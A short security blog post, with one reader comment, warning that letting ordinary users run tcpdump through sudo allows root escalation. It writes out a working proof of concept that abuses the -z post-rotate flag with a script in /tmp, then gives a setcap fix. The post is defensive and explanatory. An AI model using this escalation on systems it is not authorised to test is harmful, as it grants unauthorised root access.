Why sudo tcpdump is dangerous

Do you have Linux hosts with non privileged users allowed to run tcpdump by placing tcpdump in the sudoers file? There’s a tcpdump –z flag that allow you to specify a post-rotate command to run. The user can create a text file in /tmp with commands that will be executed as root.

Although this isn’t a newly discovered hack, it bears repeating because of the fact that this is still seen in production environments.

$ sudo -l
[sudo] password for john:
User john may run the following commands on this host:
    (root) /usr/sbin/tcpdump
-z postrotate-command
Used in conjunction with the -C or -G options, this will make tcpdumprun ” postrotate-command file ” where file is the savefile being closed after each rotation. For example, specifying -z gzipor -z bzip2 will compress each savefile using gzip or bzip2.
A way to test this is to create a file… /tmp/.test and place the “id” command in it then run the command: “sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root”
It will output:
uid=0(root) gid=0(root) groups=0(root)
The way to fix this:
With the following commands we can run Tcpdump as a normal user instead of a root user.
setcap cap_net_raw,cap_net_admin=eip /usr/sbin/tcpdump
getcap /usr/sbin/tcpdump
(Visited 1,852 times, 1 visits today)

3 thoughts on “Why sudo tcpdump is dangerous”

  1. I know this post is two years old, but I thought it was worth commenting in case any Ubuntu users stumble upon it. Ubuntu ships with AppArmor enabled by default (since 7.04), and the tcpdump profile (shipped by default since 9.04) explicitly limits `tcpdump -z` to ‘gzip’ and ‘bzip2’. You can further limit that by removing those lines from the config, if you choose.

    YMMV for other distributions, but I don’t *think* this is a problem in Ubuntu.

Leave a Reply

Your email address will not be published. Required fields are marked *